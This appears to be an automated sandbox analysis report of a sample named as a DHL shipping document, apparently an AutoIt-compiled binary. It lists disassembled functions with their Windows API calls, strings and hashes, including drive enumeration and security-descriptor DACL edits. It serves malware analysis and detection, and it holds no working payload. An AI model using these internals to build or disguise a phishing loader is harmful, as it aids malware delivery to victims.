Opcode Fuzzy Hash: 6404f061e592b13724d7f9a8839f09cdbeb4a614d76f2410370f904b395e0832
Instruction Fuzzy Hash: 1461793220870967DA395AE85892FBF2394AF72784F10095EF843CB2C1DBD2ED42CE55

Function 001C1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: bbfaf363eae6fda44ebfa0d87799d1287c94154ecf47271d502180fae9271761
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: D881747364C0A359EB2D427A8534A3EFFE15AA33A531A079DD4F2CA1C3EF24C554E620

Function 00222ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00222B30
DeleteObject.GDI32(00000000), ref: 00222B43
DestroyWindow.USER32 ref: 00222B52
GetDesktopWindow.USER32 ref: 00222B6D
GetWindowRect.USER32(00000000), ref: 00222B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00222CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00222CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00222CF8
GetClientRect.USER32(00000000,?), ref: 00222D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00222D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00222D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00222D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00222D80
GlobalLock.KERNEL32(00000000), ref: 00222D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00222D98
GlobalUnlock.KERNEL32(00000000), ref: 00222DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00222DA8
GlobalFree.KERNEL32(00000000), ref: 00222DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00222DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0023FC38,00000000), ref: 00222DDB
GlobalFree.KERNEL32(00000000), ref: 00222DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00222E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00222E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00222E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0022303F

Strings

AutoIt v3, xrefs: 00222CF2
static, xrefs: 00222D3A, 00222E91
DISPLAY, xrefs: 00222EA2
, xrefs: 00222FC5

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 4cd75c905d07cc2f72685115ee6df76e1804fafda7444eb91b329df5cbb478ce
Instruction ID: 686869a10f0ba19a1114f1d4c570afb4097dce23422451615a12f5c2d337f72a
Opcode Fuzzy Hash: 4cd75c905d07cc2f72685115ee6df76e1804fafda7444eb91b329df5cbb478ce
Instruction Fuzzy Hash: DB028975910215EFDB14DFA4EC89EAE7BB9EF49310F148158F919AB2A1CB70AD10CB60

Function 002370D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0023712F
GetSysColorBrush.USER32(0000000F), ref: 00237160
GetSysColor.USER32(0000000F), ref: 0023716C
SetBkColor.GDI32(?,000000FF), ref: 00237186
SelectObject.GDI32(?,?), ref: 00237195
InflateRect.USER32(?,000000FF,000000FF), ref: 002371C0
GetSysColor.USER32(00000010), ref: 002371C8
CreateSolidBrush.GDI32(00000000), ref: 002371CF
FrameRect.USER32(?,?,00000000), ref: 002371DE
DeleteObject.GDI32(00000000), ref: 002371E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00237230
FillRect.USER32(?,?,?), ref: 00237262
GetWindowLongW.USER32(?,000000F0), ref: 00237284

Part of subcall function 002373E8: GetSysColor.USER32(00000012), ref: 00237421
Part of subcall function 002373E8: SetTextColor.GDI32(?,?), ref: 00237425
Part of subcall function 002373E8: GetSysColorBrush.USER32(0000000F), ref: 0023743B
Part of subcall function 002373E8: GetSysColor.USER32(0000000F), ref: 00237446
Part of subcall function 002373E8: GetSysColor.USER32(00000011), ref: 00237463
Part of subcall function 002373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00237471
Part of subcall function 002373E8: SelectObject.GDI32(?,00000000), ref: 00237482
Part of subcall function 002373E8: SetBkColor.GDI32(?,00000000), ref: 0023748B
Part of subcall function 002373E8: SelectObject.GDI32(?,?), ref: 00237498
Part of subcall function 002373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 002374B7
Part of subcall function 002373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002374CE
Part of subcall function 002373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 002374DB

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 687ac507d3c5c5ec3113e81b8d94e17671956d0500ba86450e15d8be4d9e3019
Instruction ID: b511dbd960be1cde4e054c8bc4e9c9dc3c4f2488ac748e6d2eb9bb501c64701f
Opcode Fuzzy Hash: 687ac507d3c5c5ec3113e81b8d94e17671956d0500ba86450e15d8be4d9e3019
Instruction Fuzzy Hash: 3CA1A2B2018302AFDB109F60EC4CE5B7BA9FF49320F200A19F9A6A61E1D771E955DF51

Function 001B8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 001B8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 001F6AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 001F6AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001F6F43

Part of subcall function 001B8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001B8BE8,?,00000000,?,?,?,?,001B8BBA,00000000,?), ref: 001B8FC5

SendMessageW.USER32(?,00001053), ref: 001F6F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001F6F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 001F6FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 001F6FB7

Strings

0, xrefs: 001F6DCF

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 3291e4fa32f410c64a84e626aa5957f3c70c30b892fda41254f43cb1452a4f1a
Instruction ID: c056b377093a0e3f118064736cfb8ce261ac66dd70aa6a8cd61655cb34217e97
Opcode Fuzzy Hash: 3291e4fa32f410c64a84e626aa5957f3c70c30b892fda41254f43cb1452a4f1a
Instruction Fuzzy Hash: 64128B35200205DFDB29DF28D898BBAB7B5FF45700F144469F6899B261CB31ECA2DB91

Function 00222711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0022273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0022286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002228A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002228B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00222900
GetClientRect.USER32(00000000,?), ref: 0022290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00222955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00222964
GetStockObject.GDI32(00000011), ref: 00222974
SelectObject.GDI32(00000000,00000000), ref: 00222978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00222988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00222991
DeleteDC.GDI32(00000000), ref: 0022299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002229C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 002229DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00222A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00222A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00222A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00222A77
GetStockObject.GDI32(00000011), ref: 00222A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00222A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00222A97

Strings

msctls_progress32, xrefs: 00222A13
AutoIt v3, xrefs: 002228F8
static, xrefs: 0022294F, 00222A71
DISPLAY, xrefs: 0022295A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 4c9b10905ee1f09c8f155552650daa5242e978293b0cc52bdfe6347dc0677476
Instruction ID: 61814d216b7f50a03b2b5b1149070a3f19d0e55aee78919100010687832f36d6
Opcode Fuzzy Hash: 4c9b10905ee1f09c8f155552650daa5242e978293b0cc52bdfe6347dc0677476
Instruction Fuzzy Hash: 36B15A75A10215BFEB14DFA8EC8AFAABBA9EF09710F104154F914E7290D774E950CBA0

Function 00214ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00214AED
GetDriveTypeW.KERNEL32(?,0023CB68,?,\\.\,0023CC08), ref: 00214BCA
SetErrorMode.KERNEL32(00000000,0023CB68,?,\\.\,0023CC08), ref: 00214D36

Strings

RAMDisk, xrefs: 00214BF4
MMC, xrefs: 00214CDE
ATA, xrefs: 00214C98
RAID, xrefs: 00214CBB
iSCSI, xrefs: 00214CC2
Removable, xrefs: 00214C10, 00214C15
\\.\, xrefs: 00214B3F
PhysicalDrive, xrefs: 00214B76
SSD, xrefs: 00214C4A
Fibre, xrefs: 00214CAD
SAS, xrefs: 00214CC9
1394, xrefs: 00214C9F
USB, xrefs: 00214CB4
SSA, xrefs: 00214CA6
SCSI, xrefs: 00214C8A
FileBackedVirtual, xrefs: 00214CEC
CDROM, xrefs: 00214BFB
SATA, xrefs: 00214CD0
Network, xrefs: 00214C02
Unknown, xrefs: 00214BED, 00214C83
Virtual, xrefs: 00214CE5
Fixed, xrefs: 00214C09
ATAPI, xrefs: 00214C91

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 87b446de73e05ccd09197024d0e21dfb9fd5680ea2482c95d1736c6c0997f2f4
Instruction ID: 10c4ae0fa281581fa916301617073e8ffb3b7c8777c09a99d1ca2a09c73809c6
Opcode Fuzzy Hash: 87b446de73e05ccd09197024d0e21dfb9fd5680ea2482c95d1736c6c0997f2f4
Instruction Fuzzy Hash: 9961C334635206DBCB04FF24CA85DE9B7E0AB66744F244116F80EAB291DB71EDE1DB81

Function 002373E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00237421
SetTextColor.GDI32(?,?), ref: 00237425
GetSysColorBrush.USER32(0000000F), ref: 0023743B
GetSysColor.USER32(0000000F), ref: 00237446
CreateSolidBrush.GDI32(?), ref: 0023744B
GetSysColor.USER32(00000011), ref: 00237463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00237471
SelectObject.GDI32(?,00000000), ref: 00237482
SetBkColor.GDI32(?,00000000), ref: 0023748B
SelectObject.GDI32(?,?), ref: 00237498
InflateRect.USER32(?,000000FF,000000FF), ref: 002374B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002374CE
GetWindowLongW.USER32(00000000,000000F0), ref: 002374DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0023752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00237554
InflateRect.USER32(?,000000FD,000000FD), ref: 00237572
DrawFocusRect.USER32(?,?), ref: 0023757D
GetSysColor.USER32(00000011), ref: 0023758E
SetTextColor.GDI32(?,00000000), ref: 00237596
DrawTextW.USER32(?,002370F5,000000FF,?,00000000), ref: 002375A8
SelectObject.GDI32(?,?), ref: 002375BF
DeleteObject.GDI32(?), ref: 002375CA
SelectObject.GDI32(?,?), ref: 002375D0
DeleteObject.GDI32(?), ref: 002375D5
SetTextColor.GDI32(?,?), ref: 002375DB
SetBkColor.GDI32(?,?), ref: 002375E5

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 3cfa848552b85f5da0713bde81bae2d57773ef1e64ddce710216ed380690359d
Instruction ID: 37b24b3c9df52656fbbeab6d4d68295b361bb37a71d5faed7ea586e9262f49e2
Opcode Fuzzy Hash: 3cfa848552b85f5da0713bde81bae2d57773ef1e64ddce710216ed380690359d
Instruction Fuzzy Hash: BB6181B2910218AFDF109FA4EC49EEE7FB9EB08320F214115F915BB2A1D770A940DF90

Function 00230FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00231128
GetDesktopWindow.USER32 ref: 0023113D
GetWindowRect.USER32(00000000), ref: 00231144
GetWindowLongW.USER32(?,000000F0), ref: 00231199
DestroyWindow.USER32(?), ref: 002311B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002311ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0023120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0023121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00231232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00231245
IsWindowVisible.USER32(00000000), ref: 002312A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002312BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002312D0
GetWindowRect.USER32(00000000,?), ref: 002312E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0023130E
GetMonitorInfoW.USER32(00000000,?), ref: 00231328
CopyRect.USER32(?,?), ref: 0023133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 002313AA

Strings

(, xrefs: 0023131B
0, xrefs: 002310D3
tooltips_class32, xrefs: 002311E6

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 5c3c1d295425cffdbc86a9fb901ac5ff8d81fef63487d28a7711246d0d85b7ee
Instruction ID: d436c9846e6ef7e8132f8106398c3304ed9cfd8ef2f09277e5c255c936cfeff8
Opcode Fuzzy Hash: 5c3c1d295425cffdbc86a9fb901ac5ff8d81fef63487d28a7711246d0d85b7ee
Instruction Fuzzy Hash: E4B18EB1618341AFD704DF64D889B6BBBE4FF85350F008918F999AB2A1C771E864CF91

Function 00230241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002302E5
_wcslen.LIBCMT ref: 0023031F
_wcslen.LIBCMT ref: 00230389
_wcslen.LIBCMT ref: 002303F1
_wcslen.LIBCMT ref: 00230475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002304C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00230504

Part of subcall function 001BF9F2: _wcslen.LIBCMT ref: 001BF9FD

Part of subcall function 0020223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00202258
Part of subcall function 0020223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0020228A

Strings

GETITEMCOUNT, xrefs: 00230316, 00230337
SELECT, xrefs: 00230548
FINDITEM, xrefs: 00230627
DESELECT, xrefs: 0023059C
GETSUBITEMCOUNT, xrefs: 00230384, 0023039F
SELECTALL, xrefs: 00230515
ISSELECTED, xrefs: 002304DD
GETSELECTED, xrefs: 002305E1
SELECTCLEAR, xrefs: 0023052D
VIEWCHANGE, xrefs: 00230675
SELECTINVERT, xrefs: 0023057E
GETSELECTEDCOUNT, xrefs: 00230470, 0023048B
GETTEXT, xrefs: 002303EC, 00230407

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: a8ee99af90ba98c3c5c32f1558a667c98ad39a263ea189c0be8fa24828f8add1
Instruction ID: 047eacbb8326f189e20d8b695cfb95b11f2e0672f45217e3c0dce6be7e11d841
Opcode Fuzzy Hash: a8ee99af90ba98c3c5c32f1558a667c98ad39a263ea189c0be8fa24828f8add1
Instruction Fuzzy Hash: 65E1D0712283018FC714DF24C8A192AB3E6BFD8718F14495DF8969B3A6DB30ED55CB61

Function 001B8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001B8968
GetSystemMetrics.USER32(00000007), ref: 001B8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001B899B
GetSystemMetrics.USER32(00000008), ref: 001B89A3
GetSystemMetrics.USER32(00000004), ref: 001B89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001B89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001B89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001B8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001B8A3C
GetClientRect.USER32(00000000,000000FF), ref: 001B8A5A
GetStockObject.GDI32(00000011), ref: 001B8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 001B8A81

Part of subcall function 001B912D: GetCursorPos.USER32(?), ref: 001B9141
Part of subcall function 001B912D: ScreenToClient.USER32(00000000,?), ref: 001B915E
Part of subcall function 001B912D: GetAsyncKeyState.USER32(00000001), ref: 001B9183
Part of subcall function 001B912D: GetAsyncKeyState.USER32(00000002), ref: 001B919D

SetTimer.USER32(00000000,00000000,00000028,001B90FC), ref: 001B8AA8

Strings

AutoIt v3 GUI, xrefs: 001B8A20

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: e02b7af66ecbbad070f851adabce5bceb485b75e56cd6161dd940af5c05c6865
Instruction ID: 8e5a2f5c900b125b82d588988ddd1c9a869056dfa206c66fb40033e9ce682ccd
Opcode Fuzzy Hash: e02b7af66ecbbad070f851adabce5bceb485b75e56cd6161dd940af5c05c6865
Instruction Fuzzy Hash: 09B16875A0020AEFDF14DFA8DC49BEA3BB5FB48714F114229FA19A7290DB30A851CB51

Function 00200D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00201114
Part of subcall function 002010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00200B9B,?,?,?), ref: 00201120
Part of subcall function 002010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00200B9B,?,?,?), ref: 0020112F
Part of subcall function 002010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00200B9B,?,?,?), ref: 00201136
Part of subcall function 002010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0020114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00200DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00200E29
GetLengthSid.ADVAPI32(?), ref: 00200E40
GetAce.ADVAPI32(?,00000000,?), ref: 00200E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00200E96
GetLengthSid.ADVAPI32(?), ref: 00200EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00200EB5
HeapAlloc.KERNEL32(00000000), ref: 00200EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00200EDD
CopySid.ADVAPI32(00000000), ref: 00200EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00200F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00200F35
